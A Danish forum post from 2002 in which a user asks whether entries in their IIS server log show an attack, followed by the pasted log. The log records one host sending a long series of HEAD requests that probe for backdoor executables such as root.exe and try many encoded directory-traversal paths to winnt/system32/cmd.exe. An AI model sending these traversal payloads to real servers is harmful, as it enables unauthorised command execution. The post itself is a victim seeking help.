Avatar billede metal_hansen Nybegynder
16. december 2002 - 10:54 Der er 5 kommentarer og
3 løsninger

Er det her et angreb på min IIS-server?

Jeg har i de sidste par dage fået temmelig mange af de her, så nu vil jeg lige høre om jeg skal begynde at melde dem.

Fra min IIS-log:

14:32:51 147.29.115.214 HEAD /index.htm 200
14:32:51 147.29.115.214 HEAD /root.exe 404
14:32:51 147.29.115.214 HEAD /scripts/root.exe 404
14:32:51 147.29.115.214 HEAD /msadc/root.exe 404
14:32:51 147.29.115.214 HEAD /wwwroot/root.exe 404
14:32:51 147.29.115.214 HEAD /images/root.exe 404
14:32:51 147.29.115.214 HEAD /samples/root.exe 404
14:32:51 147.29.115.214 HEAD /iissamples/root.exe 404
14:32:51 147.29.115.214 HEAD /adsamples/root.exe 404
14:32:51 147.29.115.214 HEAD /cgi-bin/root.exe 404
14:32:51 147.29.115.214 HEAD /iisadmpwd/root.exe 404
14:32:51 147.29.115.214 HEAD /cmd1.exe 404
14:32:52 147.29.115.214 HEAD /scripts/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /msadc/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /wwwroot/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /images/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /samples/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /iissamples/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /adsamples/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /cgi-bin/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /iisadmpwd/cmd1.exe 404
14:32:52 147.29.115.214 HEAD /scripts/shell.exe 404
14:32:52 147.29.115.214 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
14:32:52 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:52 147.29.115.214 HEAD /scripts/..Á../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..À%9v../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..À%qf../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:53 147.29.115.214 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..o../winnt/system32/cmd.exe 404
14:32:53 147.29.115.214 HEAD /scripts/winnt/system32/cmd.exe 404
14:32:53 147.29.115.214 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..%2f../winnt/system32/cmd.exe 500
14:32:53 147.29.115.214 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
14:32:54 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /scripts/..ð€€¯../winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /scripts/..ø€€€¯../winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /scripts/..ü€€€€¯../winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
14:32:54 147.29.115.214 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
14:32:54 147.29.115.214 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
14:32:54 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:54 147.29.115.214 HEAD /scripts/winnt/system32/cmd.exe 404
14:32:55 147.29.115.214 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..%2e..%2ewinnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..%2f..%2fwinnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:55 147.29.115.214 HEAD /scripts/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
14:32:55 147.29.115.214 HEAD /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
14:32:56 147.29.115.214 HEAD /scripts/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
14:32:56 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /scripts/..o../..o../..o../winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /scripts/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
14:32:56 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /scripts/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /scripts/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /scripts/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /à\€\¯../winnt/system32/cmd.exe 404
14:32:56 147.29.115.214 HEAD /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /à\€\¯../winnt/system32/cmd.exe\ 404
14:32:57 147.29.115.214 HEAD /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:32:57 147.29.115.214 HEAD /msadc/.%2e/.%2e/winnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..%5c..%5cwinnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..%5c..%5cwinnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..%2e..%2ewinnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..%2f..%2fwinnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /msadc/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:32:58 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /msadc/..o../..o../..o../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:32:59 147.29.115.214 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:33:00 147.29.115.214 HEAD /_vti_bin/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_bin/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_bin/..o../..o../..o../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_bin/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_bin/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_bin/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_bin/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:01 147.29.115.214 HEAD /_vti_cnf/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:33:02 147.29.115.214 HEAD /_vti_cnf/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_cnf/..o../..o../..o../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_cnf/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_cnf/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_cnf/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_cnf/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_adm/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_adm/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_adm/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:03 147.29.115.214 HEAD /_vti_adm/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_adm/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_adm/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_adm/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_adm/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:04 147.29.115.214 HEAD /_vti_aut/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_aut/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /_vti_log/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:05 147.29.115.214 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:06 147.29.115.214 HEAD /cgi-bin/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /cgi-bin/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /cgi-bin/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /cgi-bin/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /cgi-bin/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:07 147.29.115.214 HEAD /cgi-bin/..o../..o../..o../winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /cgi-bin/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /cgi-bin/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /cgi-bin/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /cgi-bin/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:08 147.29.115.214 HEAD /iisadmpwd/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:09 147.29.115.214 HEAD /iisadmpwd/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..o../..o../..o../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /iisadmpwd/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:10 147.29.115.214 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /adsamples/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /adsamples/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /adsamples/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:11 147.29.115.214 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /adsamples/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /adsamples/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /adsamples/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /adsamples/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /iissamples/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /iissamples/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /iissamples/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:12 147.29.115.214 HEAD /iissamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /iissamples/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /iissamples/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /iissamples/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /iissamples/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /images/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /images/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /images/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /images/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /images/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:13 147.29.115.214 HEAD /images/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..o../..o../..o../winnt/system32/cmd.exe 404
14:33:14 147.29.115.214 HEAD /images/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /images/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /images/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /images/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /samples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /samples/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /samples/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /samples/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:15 147.29.115.214 HEAD /samples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..Á../..Á../..Á../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..o../..o../..o../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /samples/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
14:33:16 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /samples/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /samples/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /samples/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
